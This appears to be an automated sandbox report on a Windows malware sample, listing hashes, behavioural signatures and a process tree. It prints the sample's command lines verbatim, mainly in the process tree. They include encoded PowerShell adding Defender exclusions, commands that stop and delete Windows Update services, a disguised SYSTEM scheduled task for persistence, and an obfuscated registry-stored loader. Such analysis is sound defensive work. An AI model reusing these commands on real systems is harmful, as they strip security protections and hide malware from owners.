Analysis
-
max time kernel
151s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
30-08-2022 08:07
Static task
static1
Behavioral task
behavioral1
Sample
bibolobun.exe
Resource
win7-20220812-en
General
-
Target
bibolobun.exe
-
Size
5.1MB
-
MD5
2438b851e157a3f70bd48af1984b2139
-
SHA1
105ce31ecdce604bf8629ddc6580f2ad25fc21b5
-
SHA256
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494
-
SHA512
ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52
-
SSDEEP
98304:hoJgPPz4jnKiw6qbse0KZ3U/TUpm9OMtUdvHW4i/6jUH2+9Nx40u:onKl6qgeUoSOdPZi/GUH2QX40u
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 1532 created 416 1532 powershell.EXE winlogon.exe PID 1468 created 416 1468 powershell.EXE winlogon.exe -
Drops file in Drivers directory 2 IoCs
Processes:
conhost.execonhost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe -
Executes dropped EXE 3 IoCs
Processes:
conhost.exeupdate.exedialer.exepid process 1552 conhost.exe 1220 update.exe 1616 dialer.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 1020 takeown.exe 2032 icacls.exe 2012 takeown.exe 1904 icacls.exe -
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
services.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinRing0_1_2_0\ImagePath = "\\??\\C:\\Program Files\\Google\\Libs\\WR64.sys" services.exe -
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
Processes:
cmd.exepid process 2012 cmd.exe -
Loads dropped DLL 1 IoCs
Processes:
taskeng.exepid process 1892 taskeng.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exepid process 2032 icacls.exe 2012 takeown.exe 1904 icacls.exe 1020 takeown.exe -
Drops file in System32 directory 6 IoCs
Processes:
powershell.exepowershell.EXEpowershell.EXEpowershell.exesvchost.execonhost.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\Tasks\WindowsDefender svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\C717.tmp conhost.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
conhost.exepowershell.EXEpowershell.EXEconhost.exedescription pid process target process PID 304 set thread context of 1552 304 conhost.exe conhost.exe PID 1532 set thread context of 1020 1532 powershell.EXE dllhost.exe PID 1468 set thread context of 1120 1468 powershell.EXE dllhost.exe PID 1900 set thread context of 1616 1900 conhost.exe dialer.exe -
Drops file in Program Files directory 3 IoCs
Processes:
conhost.execonhost.exedescription ioc process File created C:\Program Files\Google\Libs\WR64.sys conhost.exe File created C:\Program Files\Platform\Defender\update.exe conhost.exe File opened for modification C:\Program Files\Platform\Defender\update.exe conhost.exe -
Drops file in Windows directory 6 IoCs
Processes:
svchost.execonhost.exedescription ioc process File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf svchost.exe File opened for modification C:\Windows\Tasks\dialersvc32.job svchost.exe File created C:\Windows\Tasks\dialersvc32.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc32.job conhost.exe File created C:\Windows\Tasks\dialersvc64.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc64.job conhost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1120 sc.exe 1812 sc.exe 268 sc.exe 892 sc.exe 1992 sc.exe 664 sc.exe 820 sc.exe 1288 sc.exe 1692 sc.exe 1724 sc.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1212 schtasks.exe 1068 schtasks.exe -
Modifies data under HKEY_USERS 5 IoCs
Processes:
powershell.EXEconhost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d0aade5258bcd801 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" conhost.exe -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 1488 reg.exe 976 reg.exe 1928 reg.exe 1068 reg.exe 1228 reg.exe 1288 reg.exe 1356 reg.exe 304 reg.exe 676 reg.exe 584 reg.exe 1100 reg.exe 1772 reg.exe 1412 reg.exe 380 reg.exe 940 reg.exe 112 reg.exe 1160 reg.exe 1664 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.execonhost.exepowershell.EXEdllhost.exepowershell.EXEdllhost.exepowershell.exepid process 1900 powershell.exe 304 conhost.exe 1532 powershell.EXE 1532 powershell.EXE 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1468 powershell.EXE 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1468 powershell.EXE 1120 dllhost.exe 1120 dllhost.exe 1120 dllhost.exe 1120 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1120 dllhost.exe 1120 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1120 dllhost.exe 1120 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1120 dllhost.exe 1120 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1120 dllhost.exe 1120 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1488 powershell.exe 1120 dllhost.exe 1120 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1120 dllhost.exe 1120 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1120 dllhost.exe 1120 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1120 dllhost.exe 1120 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1120 dllhost.exe 1120 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1120 dllhost.exe 1120 dllhost.exe 1020 dllhost.exe 1020 dllhost.exe 1120 dllhost.exe 1120 dllhost.exe 1020 dllhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
services.exepid process 460 services.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.execonhost.exepowershell.EXEdllhost.exepowershell.EXEdllhost.exesvchost.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exedescription pid process Token: SeDebugPrivilege 1900 powershell.exe Token: SeShutdownPrivilege 2044 powercfg.exe Token: SeShutdownPrivilege 1760 powercfg.exe Token: SeShutdownPrivilege 1732 powercfg.exe Token: SeShutdownPrivilege 1064 powercfg.exe Token: SeTakeOwnershipPrivilege 1020 takeown.exe Token: SeDebugPrivilege 304 conhost.exe Token: SeDebugPrivilege 1532 powershell.EXE Token: SeDebugPrivilege 1532 powershell.EXE Token: SeDebugPrivilege 1020 dllhost.exe Token: SeDebugPrivilege 1468 powershell.EXE Token: SeDebugPrivilege 1468 powershell.EXE Token: SeDebugPrivilege 1120 dllhost.exe Token: SeAuditPrivilege 872 svchost.exe Token: SeDebugPrivilege 1488 powershell.exe Token: SeShutdownPrivilege 1360 powercfg.exe Token: SeShutdownPrivilege 1220 powercfg.exe Token: SeShutdownPrivilege 1588 powercfg.exe Token: SeShutdownPrivilege 556 powercfg.exe Token: SeTakeOwnershipPrivilege 2012 takeown.exe Token: SeAssignPrimaryTokenPrivilege 872 svchost.exe Token: SeIncreaseQuotaPrivilege 872 svchost.exe Token: SeSecurityPrivilege 872 svchost.exe Token: SeTakeOwnershipPrivilege 872 svchost.exe Token: SeLoadDriverPrivilege 872 svchost.exe Token: SeSystemtimePrivilege 872 svchost.exe Token: SeBackupPrivilege 872 svchost.exe Token: SeRestorePrivilege 872 svchost.exe Token: SeShutdownPrivilege 872 svchost.exe Token: SeSystemEnvironmentPrivilege 872 svchost.exe Token: SeUndockPrivilege 872 svchost.exe Token: SeManageVolumePrivilege 872 svchost.exe Token: SeAssignPrimaryTokenPrivilege 872 svchost.exe Token: SeIncreaseQuotaPrivilege 872 svchost.exe Token: SeSecurityPrivilege 872 svchost.exe Token: SeTakeOwnershipPrivilege 872 svchost.exe Token: SeLoadDriverPrivilege 872 svchost.exe Token: SeSystemtimePrivilege 872 svchost.exe Token: SeBackupPrivilege 872 svchost.exe Token: SeRestorePrivilege 872 svchost.exe Token: SeShutdownPrivilege 872 svchost.exe Token: SeSystemEnvironmentPrivilege 872 svchost.exe Token: SeUndockPrivilege 872 svchost.exe Token: SeManageVolumePrivilege 872 svchost.exe Token: SeAssignPrimaryTokenPrivilege 872 svchost.exe Token: SeIncreaseQuotaPrivilege 872 svchost.exe Token: SeSecurityPrivilege 872 svchost.exe Token: SeTakeOwnershipPrivilege 872 svchost.exe Token: SeLoadDriverPrivilege 872 svchost.exe Token: SeSystemtimePrivilege 872 svchost.exe Token: SeBackupPrivilege 872 svchost.exe Token: SeRestorePrivilege 872 svchost.exe Token: SeShutdownPrivilege 872 svchost.exe Token: SeSystemEnvironmentPrivilege 872 svchost.exe Token: SeUndockPrivilege 872 svchost.exe Token: SeManageVolumePrivilege 872 svchost.exe Token: SeAssignPrimaryTokenPrivilege 872 svchost.exe Token: SeIncreaseQuotaPrivilege 872 svchost.exe Token: SeSecurityPrivilege 872 svchost.exe Token: SeTakeOwnershipPrivilege 872 svchost.exe Token: SeLoadDriverPrivilege 872 svchost.exe Token: SeSystemtimePrivilege 872 svchost.exe Token: SeBackupPrivilege 872 svchost.exe Token: SeRestorePrivilege 872 svchost.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
Explorer.EXEpid process 1420 Explorer.EXE 1420 Explorer.EXE -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
Explorer.EXEpid process 1420 Explorer.EXE 1420 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
conhost.exepid process 1468 conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
bibolobun.execonhost.execmd.execmd.execmd.exedescription pid process target process PID 1492 wrote to memory of 304 1492 bibolobun.exe conhost.exe PID 1492 wrote to memory of 304 1492 bibolobun.exe conhost.exe PID 1492 wrote to memory of 304 1492 bibolobun.exe conhost.exe PID 1492 wrote to memory of 304 1492 bibolobun.exe conhost.exe PID 304 wrote to memory of 1900 304 conhost.exe powershell.exe PID 304 wrote to memory of 1900 304 conhost.exe powershell.exe PID 304 wrote to memory of 1900 304 conhost.exe powershell.exe PID 304 wrote to memory of 1376 304 conhost.exe cmd.exe PID 304 wrote to memory of 1376 304 conhost.exe cmd.exe PID 304 wrote to memory of 1376 304 conhost.exe cmd.exe PID 304 wrote to memory of 1636 304 conhost.exe cmd.exe PID 304 wrote to memory of 1636 304 conhost.exe cmd.exe PID 304 wrote to memory of 1636 304 conhost.exe cmd.exe PID 1376 wrote to memory of 664 1376 cmd.exe sc.exe PID 1376 wrote to memory of 664 1376 cmd.exe sc.exe PID 1376 wrote to memory of 664 1376 cmd.exe sc.exe PID 1636 wrote to memory of 2044 1636 cmd.exe powercfg.exe PID 1636 wrote to memory of 2044 1636 cmd.exe powercfg.exe PID 1636 wrote to memory of 2044 1636 cmd.exe powercfg.exe PID 1376 wrote to memory of 1120 1376 cmd.exe sc.exe PID 1376 wrote to memory of 1120 1376 cmd.exe sc.exe PID 1376 wrote to memory of 1120 1376 cmd.exe sc.exe PID 304 wrote to memory of 588 304 conhost.exe cmd.exe PID 304 wrote to memory of 588 304 conhost.exe cmd.exe PID 304 wrote to memory of 588 304 conhost.exe cmd.exe PID 1376 wrote to memory of 1812 1376 cmd.exe sc.exe PID 1376 wrote to memory of 1812 1376 cmd.exe sc.exe PID 1376 wrote to memory of 1812 1376 cmd.exe sc.exe PID 1636 wrote to memory of 1760 1636 cmd.exe powercfg.exe PID 1636 wrote to memory of 1760 1636 cmd.exe powercfg.exe PID 1636 wrote to memory of 1760 1636 cmd.exe powercfg.exe PID 1376 wrote to memory of 1724 1376 cmd.exe sc.exe PID 1376 wrote to memory of 1724 1376 cmd.exe sc.exe PID 1376 wrote to memory of 1724 1376 cmd.exe sc.exe PID 588 wrote to memory of 1212 588 cmd.exe schtasks.exe PID 588 wrote to memory of 1212 588 cmd.exe schtasks.exe PID 588 wrote to memory of 1212 588 cmd.exe schtasks.exe PID 1636 wrote to memory of 1732 1636 cmd.exe powercfg.exe PID 1636 wrote to memory of 1732 1636 cmd.exe powercfg.exe PID 1636 wrote to memory of 1732 1636 cmd.exe powercfg.exe PID 1376 wrote to memory of 268 1376 cmd.exe sc.exe PID 1376 wrote to memory of 268 1376 cmd.exe sc.exe PID 1376 wrote to memory of 268 1376 cmd.exe sc.exe PID 1376 wrote to memory of 380 1376 cmd.exe reg.exe PID 1376 wrote to memory of 380 1376 cmd.exe reg.exe PID 1376 wrote to memory of 380 1376 cmd.exe reg.exe PID 1636 wrote to memory of 1064 1636 cmd.exe powercfg.exe PID 1636 wrote to memory of 1064 1636 cmd.exe powercfg.exe PID 1636 wrote to memory of 1064 1636 cmd.exe powercfg.exe PID 1376 wrote to memory of 1228 1376 cmd.exe reg.exe PID 1376 wrote to memory of 1228 1376 cmd.exe reg.exe PID 1376 wrote to memory of 1228 1376 cmd.exe reg.exe PID 1376 wrote to memory of 1488 1376 cmd.exe reg.exe PID 1376 wrote to memory of 1488 1376 cmd.exe reg.exe PID 1376 wrote to memory of 1488 1376 cmd.exe reg.exe PID 1376 wrote to memory of 1664 1376 cmd.exe reg.exe PID 1376 wrote to memory of 1664 1376 cmd.exe reg.exe PID 1376 wrote to memory of 1664 1376 cmd.exe reg.exe PID 1376 wrote to memory of 676 1376 cmd.exe reg.exe PID 1376 wrote to memory of 676 1376 cmd.exe reg.exe PID 1376 wrote to memory of 676 1376 cmd.exe reg.exe PID 1376 wrote to memory of 1020 1376 cmd.exe takeown.exe PID 1376 wrote to memory of 1020 1376 cmd.exe takeown.exe PID 1376 wrote to memory of 1020 1376 cmd.exe takeown.exe
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
- Sets service image path in registry
- Suspicious behavior: LoadsDriver
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {ED8EEDD5-C421-46A5-BBB1-FD6FC5100929} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Loads dropped DLL
-
C:\Program Files\Platform\Defender\update.exe"C:\Program Files\Platform\Defender\update.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Platform\Defender\update.exe"5⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE6⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc7⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f7⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll7⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q7⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 06⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 07⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "WindowsDefender" /tr "\"C:\Program Files\Platform\Defender\update.exe\""6⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "WindowsDefender" /tr "\"C:\Program Files\Platform\Defender\update.exe\""7⤵
- Creates scheduled task(s)
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe "epzggvhm"6⤵
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe zryhtmslhfgrpc1 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvtFmxXu9Su4ZmZ4m248qJKzYqn0Ua9E3eZCF6KVDnl4Om3mtJYdu2zYxf5VDSOtlwzNI2HELjSSWiBbhmq9nnQLcymNaMLbX6BcVfekXBXlHwtkdZ87kGHVBeHkhms/rlEKec4HZ9wIBVrc9Qi+y2+a3lep8HRZlmoXu5C0nH5vK2Z6XqFAlqh1P1TH9zlUlrSoi8iC8XAKUbdPgbva/qi9DzYr1RVc8QqRoXX8h4GvBaNJoiMytDP1XZ+7BxVOZddNH0XJdiGTlhqmJ6roc2xDtAY0xSKzjDUzaj6VcQ6dE4nGnXfnrH194gWO2Fle+qlRtL5DmSlHKlQNVMEwD+lLyH/56tXiuxnzEBOxWLJZa4aP8Qv/WXczd4ddilDeMPY13j7jZPu5TdLr9XBYda4edqFELpOQYd1Sl2t6HN/f/knReR0toj+9pfBIu/dyltFHYBgH8jIh3ZIp8xo/NopF9P+/CLEQGN4MNrl3tzSKPM88s7KlDiFV5IVDt9y2BSrs52V/tpdfNJYjkFjol69J6⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{5c5db92f-4f9e-4ce5-b41b-b870953a6830}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
